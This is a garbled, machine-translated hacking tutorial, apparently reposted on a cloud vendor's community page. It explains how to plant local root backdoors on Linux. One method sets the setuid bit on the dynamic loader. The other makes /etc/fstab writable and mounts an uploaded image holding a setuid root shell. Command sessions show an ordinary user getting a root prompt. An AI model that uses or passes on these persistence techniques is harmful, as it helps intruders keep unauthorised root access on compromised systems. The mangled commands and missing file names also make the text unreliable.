How to leave a backdoor locally in Linux

Source: Internet
Author: User
Method 1: the setuid method is actually very hidden. Look at the process: [root @ localdomainlib] # ls-l | grepld-linuxlrwxrwxrwx1rootroot92008-06-0717:

Method 1:SetUIdIn fact, 8 is very hidden. Look at the process:

[Root @ localdomain lib] #Ls-L |GrepLd-linux
Lrwxrwxrwx 1 root 9>
Lrwxrwxrwx 1 root 13>
[Root @ localdomain lib] #Chmod+ S
[Root @ localdomain lib] # ls-l | grep
-Rwsr-sr-x 1 root 128952
Lrwxrwxrwx 1 root 9>
[Root @ localdomain lib] #
Here we add the setuid attribute to the/lib/ file (which points to the file in FC8. Then we can see how to use it.

Normal user login, test permissions:

[Xiaoyu @ localdomain ~] $WhoAmi
[Xiaoyu @ localdomain ~] $/Lib/'Which Whoami`
[Xiaoyu @ localdomain ~] $

Well, hey, root. How to generate the root shell? You can think about it yourself. Don't be too thorough in everything, right. Haha, you can be certain,/lib/ certainly cannot generate rootshell, bash check euid and uid, to see whether it is equal... OK, not much said.

Method 2:

View process:

[Root @ localdomain etc] # chmod a + w/etc/fstab
[Root @ localdomain etc] #
This will be retained. This method is compared to XXOXX, and it is estimated that few administrators know it. Demo using methods
[Xiaoyu @ localdomain ~] $ Ls-l/etc/fstab
-Rw-1 root 456/etc/fstab
[Xiaoyu @ localdomain ~] $ Echo 'test/mntExT2 user,SuId, exec, loop 0 0'>/etc/fstab
Then, upload a file from the local machine to the target machine. Here we name it test.
[Xiaoyu @ localdomain tmp] $ ls-l test
-Rw-r -- 1 xiaoyu 102400 2008-04-20 test
[Xiaoyu @ localdomain tmp] $ mount test
[Xiaoyu @ localdomain tmp] $Cd/Mnt
[Xiaoyu @ localdomain mnt] $ ls-l
Total 18
Drwx ------ 2 root 12288 2008-04-20 05:44 lost + found
-Rwsr-sr-x 1 root 4927 2008-04-20 05:44 root
[Xiaoyu @ localdomain mnt] $./root
Sh-3.2 #

Now, we can see that it has been upgraded from common users to root users. Haha.

Test this file baiDuIt seems that wood has the upload function.

It seems that some people may say that the local backdoor is used by the hacker, but you have to figure it out: A webshell can complete all this ....

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.